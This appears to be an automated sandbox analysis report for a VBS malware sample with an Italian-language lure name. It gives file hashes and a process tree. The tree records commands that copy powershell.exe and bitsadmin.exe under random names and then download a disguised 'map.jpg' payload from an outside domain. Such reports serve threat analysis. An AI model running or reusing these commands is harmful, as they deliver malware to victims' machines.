Analysis
-
max time kernel
30s -
max time network
113s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
14-09-2020 12:24
Static task
static1
Behavioral task
behavioral1
Sample
Allegato_doc_03675480267.vbs
Resource
win7
windows7_x64
0 signatures
0 seconds
General
-
Target
Allegato_doc_03675480267.vbs
-
Size
4KB
-
MD5
a824af955b840327f2cf795b1b7fcabf
-
SHA1
a13ec743a3a4476339c7e521e57b431355a5c67e
-
SHA256
1dba2064e7290c1896d560ff266a18cb6bd9b7e82aad50ddcbe2afde3e43c53e
-
SHA512
acab55eed2f7468495758666d67e9593eb9e32f44da823b2b0ac7560d78f76b0f1dded255f8f51a68023e3881fc46b1b362b1fb8c47517f5179fe26d7b5cba92
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 4012 WhZRIiim.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 592 wrote to memory of 1628 592 WScript.exe 71 PID 592 wrote to memory of 1628 592 WScript.exe 71 PID 592 wrote to memory of 2708 592 WScript.exe 74 PID 592 wrote to memory of 2708 592 WScript.exe 74 PID 592 wrote to memory of 4012 592 WScript.exe 76 PID 592 wrote to memory of 4012 592 WScript.exe 76 PID 592 wrote to memory of 4012 592 WScript.exe 76
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_03675480267.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zWhZRIiim.exe2⤵PID:1628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\WhZRIiim.exe2⤵PID:2708
-
-
C:\Users\Admin\AppData\Roaming\WhZRIiim.exe"C:\Users\Admin\AppData\Roaming\WhZRIiim.exe" /transfer szlqLE /download https://unequipoganador.com/ipol/03675480267/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg2⤵
- Executes dropped EXE
PID:4012
-